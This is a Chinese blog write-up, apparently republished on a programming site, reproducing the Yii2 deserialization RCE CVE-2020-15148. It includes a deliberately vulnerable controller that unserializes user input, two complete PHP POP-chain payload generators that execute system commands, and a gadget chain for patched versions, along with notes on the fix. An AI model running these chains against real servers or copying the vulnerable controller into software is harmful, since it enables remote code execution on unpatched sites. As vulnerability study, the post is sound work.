我的编程空间,编程开发者的网络收藏夹
学习永远不晚

CVE-2020-15148复现

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

CVE-2020-15148复现

这几天进行了反序列化的学习,看到了yii反序列化,拿过来学习一下
首先

搭建环境

https://github.com/yiisoft/yii2/releases/tag/2.0.37
下载一个2.0.37版本的环境搭建下载那个basic就行
修改下配置文件config/web.php;给cookieValidationKey修改一个任意值,不然会报错
然后添加一个存在反序列化漏洞的点
添加controllers/TestController.php

namespace app\controllers;use Yii;use yii\web\Controller;class TestController extends Controller{    public function actionIndex(){        $name = Yii::$app->request->get('test');        return unserialize(base64_decode($name));        }}

这样我们在访问r=test/index&test=序列化base64之后的值,就可以进入反序列化
下面进入复现
在这里插入图片描述
入口点是在vendor/yiisoft/yii2/db/BatchQuertResult.php中
可以看到这里的__destruct魔术方法这里是必定触发的,跟进这个reset方法,发现$this->_dataReader
调用了close()方法,close方法跟进下去就没用了,但是
这里的$this->_dataReader是可控的这就导致了,我们可以找一个不含有close方法的类,去触发他的__call魔术方法,全局搜索__call
最终在Generator.php中找到了一个合适的
在这里插入图片描述
close无参,所以传入的时候method为close后面的参数为null
跟进format看看
在这里插入图片描述
找到了一个有意思的函数了call_user_function_array,先进入gerFormatter看看
在这里插入图片描述
可以看到我们可以控制formatter第一个函数
那么也就是说我们可以构造一个无参的内部函数执行命令如phpinfo这些,或者是利用call_user_func调用类中的无参方法。而第一种肯定是无法任意命令执行的,那么我们就把目标放到第二种去,全局搜索一下无参的方法,看看是否其中含有危险函数这些。
因为这里光靠全局搜索太困难了,所以可以直接搜索带有call_user_func的无参函数,可以利用正则匹配

function \w+\(\)\n? *\{(.*\n)+ *call_user_func

最终在CreateAction.php(IndexAction.php他俩是一样的)中发现一个可以利用的无参方法
在这里插入图片描述
这里的两个参数都是可控的,导致了我们可以直接使用system进行RCE
payload:

namespace yii\rest{    class Createaction{        public $checkAccess;        public $id;                public function __construct(){            $this->checkAccess = 'system';            $this->id = 'dir';        }    }}namespace Faker{    use yii\rest\Createaction;    class Generator{        protected $formatters;        public function __construct(){            $this->formatters['close'] = [new Createaction(),'run'];        }    }}namespace yii\db{    use Faker\Generator;    class BatchQueryResult{        private $_dataReader;        public function __construct()        {            $this->_dataReader=new Generator();        }    }}namespace{    use yii\db\BatchQueryResult;    echo base64_encode(serialize(new BatchQueryResult()));}

修复

这个漏洞在2.0.38之后就修复了
直接在yii\db\BatchQueryResult类里添加了一个__wakeup方法,
这样写的目的就是在当BatchQueryResult类被反序列化时就直接报错,避免反序列化的发生,也就避免了该漏洞产生。

以完全不同的思路的另一条链子

在我以为就结束了的时候,发现网上师傅的一个奇妙的思路:https://v0w.top/2020/09/22/Yii2unserialize/
除了可以通过__call方法调用无参函数外,是否有类中自带close方法存在危险函数可以利用呢
进行一番寻找终于在DbSession.php中发现了利用
在这里插入图片描述
跟进此方法发现
在这里插入图片描述
这里又调用到了call_user_func所以更改一下上面的链子就可以用

namespace yii\rest{    class Createaction{        public $checkAccess;        public $id;                public function __construct(){            $this->checkAccess = 'system';            $this->id = 'whoami';        }    }}namespace yii\web{    use yii\rest\Createaction;    class DbSession{        protected $writeCallback;        public function __construct(){            $this->writeCallback = [new Createaction(),'run'];        }    }}namespace yii\db{    use yii\web\DbSession;    class BatchQueryResult{        private $_dataReader;        public function __construct()        {            $this->_dataReader=new DbSession();        }    }}namespace{    use yii\db\BatchQueryResult;    echo base64_encode(serialize(new BatchQueryResult()));}

更新到2.0.38版本之后的利用

这里的改动,只针对于BatchQueryResult.php
所以可以寻找其他可以触发的入口,这样就能够利用这个入口按照上面的调用流程继续调用
因为这里的流程较之上面没什么不同,这里我就直接贴思路了,详情可以去看看上面我链接的VOW师傅的博客。

POP3:\Codeception\Extension\RunProcess::__destruct()->stopProcess()->$process->isRunning()->Faker\Generator::__call()->format()->call_user_func_array()->\yii\rest\IndexAction::run->call_user_func()

第四个就是从clearAll方法进入__tostring然后利用其中可以可以调用__call方法的地方继续使用上面的链子
至此,复现完成咯

来源地址:https://blog.csdn.net/your_friends/article/details/127776084

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

CVE-2020-15148复现

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

CVE-2020-15148漏洞分析

这篇文章主要为大家介绍了CVE-2020-15148漏洞分析,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪
2023-02-24

CVE-2020-15148漏洞怎么解决

今天小编给大家分享一下CVE-2020-15148漏洞怎么解决的相关知识点,内容详细,逻辑清晰,相信大部分人都还太了解这方面的知识,所以分享这篇文章给大家参考一下,希望大家阅读完这篇文章后有所收获,下面我们一起来了解一下吧。Yii2Yii是
2023-07-05

CVE-2020-9402 Django GIS SQL注入漏洞复现

原文:https://www.cnblogs.com/-Anguvia-/p/14638389.html
CVE-2020-9402 Django GIS SQL注入漏洞复现
2017-03-26

oracle 7月份更新 CVE-2020-14625 复现&利用

危害绕过T3黑名单 ,复活ysoserial gadget利用diff补丁首先下载7月份补丁,与四月份对比,发现有以下不同之处com.oracle.wls.shaded.org.apache.xalan.xsltc.trax我们看一下这个类的代码从名字,还有代
oracle 7月份更新 CVE-2020-14625 复现&利用
2021-01-31

Apache log4j2-RCE 漏洞复现及修复建议(CVE-2021-44228)

Apache log4j2是一款流行的Java日志库。CVE-2021-44228是log4j2中的一个远程代码执行(RCE)漏洞,该漏洞允许攻击者通过构造恶意的日志消息来执行任意的代码。漏洞复现:1. 下载并安装Apache log4j2
2023-08-17

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录